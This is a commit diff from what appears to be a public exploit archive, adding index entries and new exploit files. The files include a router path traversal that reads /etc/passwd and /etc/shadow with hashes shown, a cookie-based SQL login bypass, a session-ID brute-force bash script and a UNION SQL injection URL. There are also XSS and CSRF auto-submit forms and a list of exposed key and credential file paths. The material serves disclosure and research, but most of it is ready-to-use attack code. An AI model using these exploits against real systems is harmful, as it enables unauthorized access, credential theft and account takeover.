Updated 11_23_2014
This commit is contained in:
parent
ba4b116f27
commit
4283820381
13 changed files with 885 additions and 1 deletions
14
files.csv
14
files.csv
|
@ -26857,7 +26857,7 @@ id,file,description,date,author,platform,type,port
|
|||
29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 - Multiple Cross Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0
|
||||
29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0
|
||||
29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 (.zip) - Crash PoC",2013-11-30,KAI,windows,dos,0
|
||||
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution Using Admin Privileges",2013-11-30,BlackDream,php,webapps,0
|
||||
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0
|
||||
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
|
||||
29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0
|
||||
29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service Vulnerability",2007-05-01,"Derek Abdine",linux,dos,0
|
||||
|
@ -31766,6 +31766,7 @@ id,file,description,date,author,platform,type,port
|
|||
35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
|
||||
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
|
||||
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
|
||||
35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0
|
||||
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
|
||||
35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0
|
||||
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
|
||||
|
@ -31805,3 +31806,14 @@ id,file,description,date,author,platform,type,port
|
|||
35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0
|
||||
35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
|
||||
35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0
|
||||
35314,platforms/linux/remote/35314.txt,"Wireshark <= 1.4.3 - '.pcap' File Memory Corruption Vulnerability",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0
|
||||
35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 'custid' Parameter SQL Injection Vulnerability",2011-02-07,NoNameMT,php,webapps,0
|
||||
35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass Vulnerability",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0
|
||||
35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0
|
||||
35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0
|
||||
35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
|
||||
35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
|
||||
35321,platforms/php/webapps/35321.txt,"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability",2014-11-22,Vulnerability-Lab,php,webapps,0
|
||||
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
|
||||
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
|
||||
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
18
platforms/hardware/remote/35317.txt
Executable file
18
platforms/hardware/remote/35317.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/46224/info
|
||||
|
||||
Multiple Check Point endpoint security products are prone to multiple information-disclosure vulnerabilities.
|
||||
|
||||
Attackers can exploit these issues to harvest sensitive information that may lead to further attacks.
|
||||
|
||||
http://www.example.com/conf/ssl/apache/integrity-smartcenter.cert
|
||||
http://www.example.com/conf/ssl/apache/integrity-smartcenter.key
|
||||
http://www.example.com/conf/ssl/apache/integrity.cert
|
||||
http://www.example.com/conf/ssl/apache/integrity.key
|
||||
http://www.example.com/conf/ssl/apache/smartcenter.cert
|
||||
http://www.example.com/conf/ssl/integrity-keystore.jks
|
||||
http://www.example.com/conf/ssl/isskeys.jks
|
||||
http://www.example.com/conf/ssl/openssl.pem
|
||||
http://www.example.com/conf/integrity.xml
|
||||
http://www.example.com/conf/jaas/users.xml
|
||||
http://www.example.com/bin/DBSeed.xml
|
||||
http://www.example.com:8080/conf/ssl/apache/integrity-smartcenter.cert
|
86
platforms/hardware/webapps/35325.txt
Executable file
86
platforms/hardware/webapps/35325.txt
Executable file
|
@ -0,0 +1,86 @@
|
|||
Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit
|
||||
|
||||
|
||||
Vendor: NETGEAR
|
||||
Product web page: http://www.netgear.com
|
||||
Affected version: WNR500 (firmware: 1.0.7.2)
|
||||
|
||||
Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves
|
||||
your legacy Wireless-G network. It is a simple, secure way to share your
|
||||
Internet connection and allows you to easily surf the Internet, use email,
|
||||
and have online chats. The quick, CD-less setup can be done through a web
|
||||
browser. The small, efficient design fits perfectly into your home.
|
||||
|
||||
Desc: The router suffers from an authenticated file inclusion vulnerability
|
||||
(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
|
||||
not properly verified before being used to include files. This can be exploited
|
||||
to include files from local resources with directory traversal attacks.
|
||||
|
||||
Tested on: mini_httpd/1.19 19dec2003
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2014-5208
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php
|
||||
|
||||
|
||||
16.11.2014
|
||||
|
||||
--
|
||||
|
||||
|
||||
= 1 =============================================================
|
||||
|
||||
GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1
|
||||
Host: 192.168.1.1:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
|
||||
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
|
||||
Connection: keep-alive
|
||||
|
||||
---
|
||||
|
||||
HTTP/1.0 200 OK
|
||||
Content-type: text/html
|
||||
Cache-Control: no-cache
|
||||
set-cookie: sessionid=7dc3268b;
|
||||
set-cookie: auth=ok;
|
||||
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
|
||||
|
||||
#root:x:0:0:root:/root:/bin/bash
|
||||
root:x:0:0:root:/root:/bin/sh
|
||||
#tw:x:504:504::/home/tw:/bin/bash
|
||||
#tw:x:504:504::/home/tw:/bin/msh
|
||||
|
||||
|
||||
= 2 =============================================================
|
||||
|
||||
GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1
|
||||
Host: 192.168.1.1:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
|
||||
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
|
||||
Connection: keep-alive
|
||||
|
||||
---
|
||||
|
||||
HTTP/1.0 200 OK
|
||||
Content-type: text/html
|
||||
Cache-Control: no-cache
|
||||
set-cookie: sessionid=7dc3268b;
|
||||
set-cookie: auth=ok;
|
||||
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
|
||||
|
||||
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
|
||||
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
|
||||
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|
||||
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
|
7
platforms/linux/remote/35314.txt
Executable file
7
platforms/linux/remote/35314.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/46167/info
|
||||
|
||||
Wireshark is prone to a memory-corruption vulnerability because it fails to properly handle certain files.
|
||||
|
||||
Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application.
|
||||
|
||||
http://www.exploit-db.com/sploits/35314.pcap
|
18
platforms/multiple/remote/35316.sh
Executable file
18
platforms/multiple/remote/35316.sh
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/46178/info
|
||||
|
||||
The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.
|
||||
|
||||
An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.
|
||||
|
||||
#!/bin/bash
|
||||
start=1267604160
|
||||
end=1267605960
|
||||
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
|
||||
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
|
||||
"1" ] then echo "Session ID Found: $i"
|
||||
fi
|
||||
if [ $(($i % 100)) -eq "0" ]
|
||||
then echo "Currently at $i"
|
||||
fi
|
||||
done
|
||||
|
26
platforms/php/webapps/35271.txt
Executable file
26
platforms/php/webapps/35271.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# Title : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
|
||||
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
|
||||
# Home : http://milw00rm.com / its online
|
||||
# Date : 17.11.2014
|
||||
# Demo : http://www.era.sn/courrier
|
||||
# Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
|
||||
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
|
||||
|
||||
you first go here:
|
||||
|
||||
http://www.target.com/path/index.php?page=welcome.php
|
||||
|
||||
you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.
|
||||
|
||||
exploit:
|
||||
|
||||
javascript:document.cookie = "UserId=[username] ' or '; path=/";
|
||||
|
||||
or you edit your cookie's with "Cookies Manager"
|
||||
|
||||
name = maarch
|
||||
contents = UserId=username ' or '
|
||||
host = your target
|
||||
path = /script_path/
|
||||
|
||||
and dont change other options its keep default.
|
10
platforms/php/webapps/35315.txt
Executable file
10
platforms/php/webapps/35315.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/46171/info
|
||||
|
||||
Escortservice is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
Escortservice 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
|
||||
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+
|
10
platforms/php/webapps/35319.txt
Executable file
10
platforms/php/webapps/35319.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/46250/info
|
||||
|
||||
WebAsyst Shop-Script is prone to a cross-site-scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
|
||||
http://www.example.com/html/scripts/index.php?>[xss]
|
||||
|
||||
http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export=
|
46
platforms/php/webapps/35320.txt
Executable file
46
platforms/php/webapps/35320.txt
Executable file
|
@ -0,0 +1,46 @@
|
|||
source: http://www.securityfocus.com/bid/46256/info
|
||||
|
||||
ViArt Shop is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
ViArt Shop 4.0.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
1. http://www.example.com/admin/admin_product.php?category_id=0&item_id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
|
||||
|
||||
2. <form action="http://www.example.com/admin/admin_global_settings.php" method="post" name="main">
|
||||
<input type="hidden" name="operation" value="save">
|
||||
<input type="hidden" name="rp" value="admin.php">
|
||||
<input type="hidden" name="tab" value="general">
|
||||
<input type="hidden" name="site_name" value="Default Site">
|
||||
<input type="hidden" name="site_url" value="http://host/">
|
||||
<input type="hidden" name="admin_email" value="email@example.com">
|
||||
<input type="hidden" name="layout_id" value="1">
|
||||
<input type="hidden" name="password_encrypt" value="0">
|
||||
<input type="hidden" name="admin_password_encrypt" value="0">
|
||||
<input type="hidden" name="html_below_footer" value='12345"><script>alert(document.cookie)</script>'>
|
||||
|
||||
<input type="hidden" name="operation" value="save">
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
||||
|
||||
|
||||
3. <form action="http://www.example.com/admin/admin_manufacturer.php" method="post" name="main">
|
||||
<input type="hidden" name="operation" value="save">
|
||||
<input type="hidden" name="manufacturer_id" value="3">
|
||||
<input type="hidden" name="manufacturer_name" value='Company"><script>alert(document.cookie)</script>'>
|
||||
<input type="hidden" name="manufacturer_order" value="1">
|
||||
<input type="hidden" name="friendly_url" value="">
|
||||
<input type="hidden" name="affiliate_code" value="">
|
||||
<input type="hidden" name="short_description" value="">
|
||||
<input type="hidden" name="full_description" value="">
|
||||
<input type="hidden" name="image_small" value="images/manufacturers/small/company.gif">
|
||||
<input type="hidden" name="image_small_alt" value="company">
|
||||
<input type="hidden" name="image_large" value="images/manufacturers/large/company.gif">
|
||||
<input type="hidden" name="image_large_alt" value="company">
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
260
platforms/php/webapps/35321.txt
Executable file
260
platforms/php/webapps/35321.txt
Executable file
|
@ -0,0 +1,260 @@
|
|||
Document Title:
|
||||
===============
|
||||
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1353
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2014-11-07
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1353
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.1
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store.
|
||||
Without installation and own webspace you can begin to create products and content right after the registration. With our
|
||||
free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an
|
||||
expert to work with the SUPR Shop.
|
||||
|
||||
( Copy of the Vendor Homepage: http://de.supr.com/tour )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2014-11-05: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Supreme NewMedia GmbH
|
||||
Product: Supr - Shopsystem Web Application 5.1.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
|
||||
The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non
|
||||
expired session or by local post inject.
|
||||
|
||||
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
|
||||
Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link).
|
||||
Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail
|
||||
POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded.
|
||||
|
||||
The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
|
||||
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
|
||||
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
|
||||
|
||||
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
|
||||
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
|
||||
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
|
||||
sources and application-side manipulation of affected or connected module context.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Dashboard > Settings > General > (setting_shopdetail)
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] blogname
|
||||
[+] blog/shop slogan
|
||||
[+] tags
|
||||
|
||||
Affected Module(s):
|
||||
[+] Dashboard (localhost:80/a/wp-admin/[x])
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
|
||||
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Dashboard > Settings > General > (setting_shopdetail)
|
||||
|
||||
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
|
||||
<div class="form-row field-error">
|
||||
<div class="label">
|
||||
<label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
|
||||
</div>
|
||||
<div class="field">
|
||||
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
|
||||
<!-- <pre></pre> -->
|
||||
<ul class="">
|
||||
<li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
|
||||
</ul></div>
|
||||
|
||||
Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
|
||||
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
|
||||
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] ---
|
||||
Status: 200[OK]
|
||||
POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
|
||||
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:80]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
|
||||
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
|
||||
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
|
||||
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
|
||||
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
|
||||
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
|
||||
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
|
||||
__utmb=182188197.24.10.1414786850]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
POST-Daten:
|
||||
setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
|
||||
setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
|
||||
shopreg%5Bshoplang%5D[de_DE]
|
||||
setting_shopdata%5Bshoplang%5D[de_DE]
|
||||
setting_shopdata%5Bshopcategory%5D[]
|
||||
setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
|
||||
setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
|
||||
setting_shopdata%5Bemailfooter%5D[]
|
||||
setting_shopdata%5Binvoicenote%5D[]
|
||||
setting_shopdata%5Bshop_google_analytics_account%5D[]
|
||||
setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
|
||||
setting_shopdata%5Bsubmit%5D[save]
|
||||
Response Header:
|
||||
Date[Fri, 31 Oct 2014 20:25:22 GMT]
|
||||
Server[Apache/2.2.16 (Debian)]
|
||||
X-Powered-By[PHP/5.3.3-7+squeeze22]
|
||||
p3p[CP="CAO PSA OUR"]
|
||||
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
|
||||
Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
|
||||
Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
|
||||
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
|
||||
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
|
||||
Pragma[no-cache]
|
||||
X-Frame-Options[SAMEORIGIN]
|
||||
Connection[close]
|
||||
Content-Type[text/html; charset=UTF-8]
|
||||
--
|
||||
Status: 200[OK]
|
||||
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!]
|
||||
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[283] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:80]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
|
||||
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
|
||||
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
|
||||
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
|
||||
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
|
||||
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
|
||||
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Date[Fri, 31 Oct 2014 20:25:24 GMT]
|
||||
Server[Apache/2.2.16 (Debian)]
|
||||
Content-Length[283]
|
||||
Keep-Alive[timeout=5, max=8]
|
||||
Connection[Keep-Alive]
|
||||
Content-Type[text/html; charset=iso-8859-1]
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
|
||||
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
|
||||
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure parse and encode of the vulnerable setting_shopdetail values in the input POST method request.
|
||||
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
|
||||
Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
